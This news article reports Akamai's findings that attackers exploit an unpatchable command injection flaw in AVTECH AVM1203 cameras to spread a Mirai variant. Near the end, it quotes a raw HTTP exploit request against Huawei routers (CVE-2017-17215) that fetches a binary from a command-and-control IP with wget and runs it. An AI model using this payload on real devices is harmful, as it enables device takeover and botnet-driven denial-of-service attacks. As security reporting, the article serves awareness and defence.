Skip to content

Unpatchable 0-day in security camera is abused to install Mirai

    The word ZERO-DAY is hidden in a screen full of ones and zeros.

    Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a malware family that spreads infected Internet of Things (IoT) devices across large networks and then uses them in attacks to take down websites and other internet-connected devices.

    The attacks target the AVM1203, a surveillance device made by Taiwanese manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easily exploitable and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

    That time a motley army shook the internet

    Akamai said the attackers exploited the vulnerability to deploy a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down the cybersecurity news site Krebs on Security. Mirai included functionality that allowed an army of compromised webcams, routers and other types of IoT devices to launch distributed denial-of-service attacks of record-breaking magnitude. In the weeks that followed, the Mirai botnet launched similar attacks against internet service providers and other targets. One such attack, against dynamic domain name provider Dyn, took down large swaths of the internet. To complicate efforts to contain Mirai, its creators released the malware publicly, a move that allowed virtually anyone to create their own botnets capable of delivering DDoS attacks of once-unimaginable magnitude.

    Kyle Lefton, a security researcher with Akamai's Security Intelligence and Response Team, said in an email that the threat actor behind the attacks has seen DDoS attacks against “several organizations,” which he did not name or describe. So far, the team has seen no indication that the threat actors are monitoring video feeds or using the compromised cameras for other purposes.

    Akamai detected the activity using a “honeypot” of devices that mimic cameras on the open internet to watch for attacks aimed at them. The technique doesn't allow researchers to gauge the size of the botnet. The U.S. Cybersecurity and Infrastructure Security Agency warned about the vulnerability earlier this month.

    The technique, however, allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when the exploit code was made public. The zero-day is in the “clarity argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, was only formally acknowledged this month, with the publication of CVE-2024-7029.

    Wednesday's message continued:

    How does it work?

    This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
    Decoded payload

    Figure 1: Decrypted payload body of the exploit attempts
    Enlarge / Figure 1: Decrypted payload body of the exploit attempts

    Akamai

    Figure 1: Decrypted payload body of the exploit attempts

    The vulnerability is in the brightness function in the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

    Figure 2: PoC of the exploit
    Enlarge / Figure 2: PoC of the exploit

    Akamai

    What could happen?

    In the exploit examples we've seen, essentially the following happened: By exploiting this vulnerability, an attacker could execute remote code on a target system.

    Figure 3 is an example of a threat actor exploiting this flaw to download and execute a JavaScript file to retrieve and load their main malware payload. Like many other botnets, this one is also spreading a variant of Mirai malware to its targets.

    Figure 3: JavaScript Downloader Strings
    Enlarge / Figure 3: JavaScript Downloader Strings

    Akamai

    In this case, the botnet is likely using the Corona Mirai variant, which was already mentioned by other vendors in 2020 in connection with the COVID-19 virus.

    When executed, the malware connects to a large number of hosts via Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

    Figure 4: Malware execution with console output
    Enlarge / Figure 4: Malware execution with console output

    Akamai

    Static analysis of the strings in the malware samples shows that the /ctrlt/DeviceUpgrade_1 path is targeted in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

    POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

    The botnet also targeted several other vulnerabilities, including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have seen these vulnerabilities exploited multiple times in the wild, and they continue to be successful.

    Since this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all internet-connected devices, IoT devices should never be accessed using the default credentials that came with the devices.